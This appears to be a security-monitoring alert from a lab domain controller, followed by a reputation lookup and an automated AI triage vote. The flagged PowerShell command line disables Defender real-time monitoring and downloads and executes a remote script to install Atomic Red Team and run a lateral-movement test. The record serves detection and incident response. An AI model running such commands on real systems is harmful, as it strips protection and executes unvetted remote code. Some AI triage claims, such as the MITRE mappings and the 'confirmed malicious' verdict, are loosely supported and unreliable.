{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 155828224,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8396,
        "THIS_ATOM": "d55d696523198bca24198fe369c2a848",
        "THREADS": 3,
        "TIMESTAMP": 1774364743439,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8396,
      "PROCESS_ID": 7484,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
      "event_time": 1774364744023,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2893,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "d55d696523198bca24198fe369c2a848",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "206ee127bfd4633f7821f3c569c2a84a"
    }
  },
  "detect_id": "27195e4d-0508-4642-829e-b52069c2a84a",
  "gen_time": 1774364746922,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
    "event_time": 1774364744023,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2893,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "d55d696523198bca24198fe369c2a848",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "206ee127bfd4633f7821f3c569c2a84a"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364747000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by the Atomic Red Team installation?",
    "Were any user accounts modified to gain elevated privileges?",
    "Is there evidence of data exfiltration from this host?",
    "What was the purpose of disabling real-time monitoring on this system?"
  ],
  "ioc_analysis": "The process is running legitimate Windows PowerShell but executing highly suspicious commands including disabling real-time monitoring, downloading remote script content via Invoke-WebRequest, and invoking IEX (Invoke-Expression) to execute remote code. The command line contains specific references to Atomic Red Team installation and testing frameworks which are known offensive security tools.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1021.005 - CheckPrereqs"
    }
  ],
  "mitre_techniques": [
    "T1021.005",
    "T1059.004",
    "T1567.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to GitHub raw.githubusercontent.com at the network perimeter",
    "Review and disable any scheduled tasks or services that may have been modified",
    "Conduct forensic analysis of C:\\Windows\\Temp\\ directory for additional artifacts",
    "Check for persistence mechanisms in startup folders or registry run keys"
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell scripts designed to disable real-time monitoring and deploy the Atomic Red Team framework. The command line explicitly disables Microsoft Defender\u0027s real-time protection and downloads code from an external GitHub repository.\n\n**IOC Analysis:** The process is running legitimate Windows PowerShell but executing highly suspicious commands including disabling real-time monitoring, downloading remote script content via Invoke-WebRequest, and invoking IEX (Invoke-Expression) to execute remote code. The command line contains specific references to Atomic Red Team installation and testing frameworks which are known offensive security tools.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a PowerShell process running from a legitimate system location with a Microsoft-signed hash, but the command line attempts to disable real-time monitoring and install Atomic Red Team tools, which are typically used in security testing. However, the parent process is a temporary batch file, raising suspicion.\n\n**IOC Analysis:** FILE_PATH: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known Windows system binary, so it is likely benign. HASH: de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c is Microsoft-signed, supporting legitimacy. COMMAND_LINE: Contains actions to disable monitoring and download scripts, which could be malicious but may be part of legitimate red team testing. PARENT: C:\\Windows\\System32\\cmd.exe is a system binary, but invoked from a temporary file, which is suspicious.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}